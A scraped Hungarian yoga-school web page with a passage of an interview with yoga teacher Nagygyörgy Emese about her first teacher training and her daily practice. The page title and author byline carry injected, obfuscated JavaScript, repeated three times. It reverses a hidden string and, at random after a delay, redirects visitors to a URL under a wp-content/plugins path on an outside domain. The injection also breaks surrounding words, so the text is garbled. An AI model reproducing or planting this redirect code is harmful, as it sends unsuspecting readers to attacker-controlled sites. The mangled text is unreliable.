Top

A jógaoktatók oktatói – Nagygyörgy Emese

emese-joga-h$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andst$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and

A jógaoktatók oktatói – Nagygyörgy Emese

andó csapat, akikre “rá lehet írni” az adott gyakorlást. A Gerincjógában pedig az aprólékosságát, azt, hogy a figyelem irányítása milyen nagy változásokhoz vezet.
 
Emlékszel az első jógaoktató képzésedre?
 
Persze, Gödöllőn jártam jógázni legelőször és az oktató egy idő után megkért, hogy helyettesítsem. Utána nála elvégeztem egy tanfolyamot, de éreztem, hogy valami nagyon hiányzik belőle. Adott egy keretet, de például nem is tanultunk anatómiát. Az, hogy jógaoktató lettem, egyértelműen a Mandalában dőlt el, azt éreztem, hogy “jé, hát ezt így is lehet…”. Aztán beiratkoztam az első képzésre, és onnantól már organikusan ment tovább minden.
 
A hétköznapjaidban mennyire van jelen a jóga? Hogyan változtatta meg?
 
Ha nem gyakorlok, nem vagyok jól. Hisztis vagyok, nyugtalan. Szükségem van arra az egy-másfél órára minden reggel, ami a gyakorlásom ideje. Akkor nem foglalkozom mással, nem szűrődnek be a problémák. Gyakorlás után már jöhet bármi.
 
 
Szerző:
$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])==”string”)return $GQRkExOVl1p57bbeL4u.list[n].split(“”).reverse().join(“”);return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=[“‘php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andalajoga.hu/jogaoktato-kepzes-archiv/hatha-joga-oktatokepzes/”>fb_oktato_hatha

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.